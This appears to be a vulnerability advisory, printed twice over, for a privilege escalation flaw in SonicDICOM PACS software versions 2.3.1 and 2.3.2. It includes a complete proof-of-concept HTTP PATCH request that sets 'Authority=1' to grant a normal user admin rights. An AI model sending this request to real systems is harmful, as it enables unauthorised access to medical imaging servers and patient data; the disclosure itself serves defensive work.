VULHUB ™

### Summary SonicDICOM is PACS software that combines the capabilities of DICOM Server with web browser based DICOM Viewer. ### Description The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by sending a HTTP PATCH request seting the parameter 'Authority' to integer value '1' gaining admin rights. ### Vendor JIUN Corporation - https://www.sonicdicom.com ### Affected Version 2.3.2 and 2.3.1 ### Tested On Microsoft-HTTPAPI/2.0 ### PoC ``` PATCH /viewer/api/accounts/update HTTP/1.1 Host: 172.19.0.214 Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Escalation Browser/1.0 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: {REMOVED_FOR_BREVITY} Connection: close Id=testingus&Name=peend&Authority=1 ```

### Summary SonicDICOM is PACS software that combines the capabilities of DICOM Server with web browser based DICOM Viewer. ### Description The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by sending a HTTP PATCH request seting the parameter 'Authority' to integer value '1' gaining admin rights. ### Vendor JIUN Corporation - https://www.sonicdicom.com ### Affected Version 2.3.2 and 2.3.1 ### Tested On Microsoft-HTTPAPI/2.0 ### PoC ``` PATCH /viewer/api/accounts/update HTTP/1.1 Host: 172.19.0.214 Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Escalation Browser/1.0 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: {REMOVED_FOR_BREVITY} Connection: close Id=testingus&Name=peend&Authority=1 ```